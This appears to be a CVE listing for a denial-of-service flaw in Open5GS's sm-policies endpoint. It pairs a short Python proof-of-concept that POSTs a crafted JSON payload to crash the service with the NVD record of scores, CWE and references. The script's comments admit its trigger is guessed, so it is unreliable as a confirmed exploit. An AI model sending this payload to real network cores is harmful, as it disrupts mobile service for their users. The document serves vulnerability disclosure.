CVE-2026-8223

# PoC for CVE-2026-8223 (Conceptual) # Target: Open5GS sm-policies endpoint # Author: Security Analyst import requests import sys def trigger_dos(target_ip, target_port): # Endpoint vulnerable in Open5GS <= 2.7.7 url = f"http://{target_ip}:{target_port}/npcf-smpolicy/v2/sm-policies" # Crafted payload to trigger pcf_sess_sbi_discover_and_send issue # The specific malformed structure depends on the exact parser flaw payload = { "ipv4Address": "10.0.0.1", "dnn": "internet", "servingNetwork": {"mcc": "001", "mnc": "01"}, "subscriptionId": {"imsi": "001010000000001"}, # Potential trigger for the manipulation mentioned "requestIndication": {"reportType": ["URR"]} } headers = { "Content-Type": "application/json", "Accept": "application/json" } try: print(f"[*] Sending payload to {url}...") response = requests.post(url, json=payload, headers=headers, timeout=5) print(f"[+] Response Code: {response.status_code}") # If the service crashes, subsequent packets will be dropped except requests.exceptions.RequestException as e: print(f"[!] Service may have crashed or connection refused: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve_2026_8223.py <IP> <PORT>") else: trigger_dos(sys.argv[1], sys.argv[2])

{"cve": {"id": "CVE-2026-8223", "sourceIdentifier": "[email protected]", "published": "2026-05-10T03:16:08.863", "lastModified": "2026-05-11T16:17:41.303", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Open5GS up to 2.7.7. Affected by this vulnerability is the function pcf_sess_sbi_discover_and_send of the component sm-policies Endpoint. Performing a manipulation results in denial of service. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/issues/4438", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/808442", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362440", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362440/cti", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/808442", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}